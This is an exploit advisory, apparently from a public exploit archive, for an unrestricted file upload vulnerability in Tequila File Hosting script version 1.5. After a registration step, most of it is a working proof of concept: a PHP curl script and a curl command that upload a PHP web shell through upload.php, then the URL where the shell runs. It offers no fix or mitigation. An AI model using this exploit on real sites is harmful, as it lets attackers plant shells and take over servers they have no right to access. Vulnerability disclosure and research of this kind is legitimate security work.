Tequila File Hosting 1.5 Shell Upload
Posted on 16 December 2015
================================================================================ Tequila File Hosting Unrestricted File Upload ================================================================================ # Vendor Homepage: http://codecanyon.net/item/tequila-file-hosting-script/7604312 # Date: 16/12/2015 # Software Link: http://ehsansec.ir/apps/Tequila_v1.5-File_Hosting_Script.rar # Author: Ashiyane Digital Security Team # Verion: 1.5 # Contact: hehsan979@gmail.com # Source: http://ehsansec.ir/advisories/tequila-upload.txt ================================================================================ # Description: Tequila is a solid, safe, fast, simple and intuitive script which allows companies or individuals to upload, manage and share their files online. It is studied in every feature and was produced with attention to every detail. # PoC : First register in the site===> http://localhost/tequila/register.php Next using this exploit : <?php // page : upload.php $postData = array('folder' => '/username', 'file' => '@shell.php'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://localhost/tequila/upload.php"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postData ); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> or curl -i -F folder='/ehsann' -F file=@ehsan.png http://localhost/tequila/upload.php Sheller uploaded. Path of shell : http://localhost/tequila/files/username/shell.php ================================================================================ # Discovered By : Ehsan Hosseini (EhsanSec.ir) ================================================================================
